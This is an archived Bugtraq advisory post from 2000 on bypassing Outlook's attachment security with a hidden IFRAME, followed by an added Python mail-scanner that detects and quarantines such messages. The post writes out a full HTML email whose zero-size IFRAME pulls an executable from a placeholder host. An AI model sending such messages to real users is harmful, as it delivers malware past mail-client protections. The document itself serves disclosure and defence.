Bugtraq mailing list archives
Circumventing Outlook Security Update File Download Security With IFRAMEs
From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Fri, 9 Jun 2000 14:33:33 -0800
This is an update to my previous post on malicious URLs and Outlook. You *can* circumvent the Outlook E-Mail Security Update with IFRAMEs.

Example:

    % sendmail outlookuser () example com
    MIME-Version: 1.0
    Content-Type: text/html
    Subject: Fake Attachment

    <html>
    <iframe src='http://download.example.com/badfile.exe' height=0 width=0>
    </html>"
    .

This will display an IE 'open/download' dialog if the message is viewed in the preview pane or opened for reading. So Outlook with the patch is still vulnerable to worms, virii and trojans.
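
Added example (not part of the original post): a mail-gateway style check that parses a raw message and flags any text/html part containing an IFRAME with a remote source, the construct the post describes. The class and function names, the quarantine policy and both sample messages are assumptions constructed for this illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeFinder(HTMLParser):
    """Collect every <iframe> in an HTML body with its src and declared size."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "").strip()
        hidden = any(a.get(d, "").strip() in ("0", "0px") for d in ("height", "width"))
        remote = urlparse(src).scheme.lower() in ("http", "https", "ftp") or src.startswith("//")
        self.frames.append({"src": src, "remote": remote, "hidden": hidden})

def scan_message(raw: bytes):
    """Return iframe findings for every text/html part of a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        finder = IframeFinder()
        finder.feed(part.get_content())
        finder.close()
        findings.extend(finder.frames)
    return findings

def should_quarantine(raw: bytes) -> bool:
    """Assumed policy: any remote-source iframe in mail is grounds to hold it."""
    return any(f["remote"] for f in scan_message(raw))

# Constructed sample messages; SAMPLE is modelled on the message in the post.
SAMPLE = (b"MIME-Version: 1.0\r\n"
          b"Content-Type: text/html\r\n"
          b"Subject: Fake Attachment\r\n\r\n"
          b"<html>\r\n<iframe src='http://download.example.com/badfile.exe'"
          b" height=0 width=0>\r\n</html>\r\n")
BENIGN = (b"MIME-Version: 1.0\r\nContent-Type: text/html\r\n"
          b"Subject: hi\r\n\r\n<html><p>hello</p></html>\r\n")

if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, should_quarantine(raw), scan_message(raw))
```

The `hidden` flag records a zero height or width as a secondary signal; the quarantine decision here rests on the remote source alone, since a visible frame triggers the same fetch.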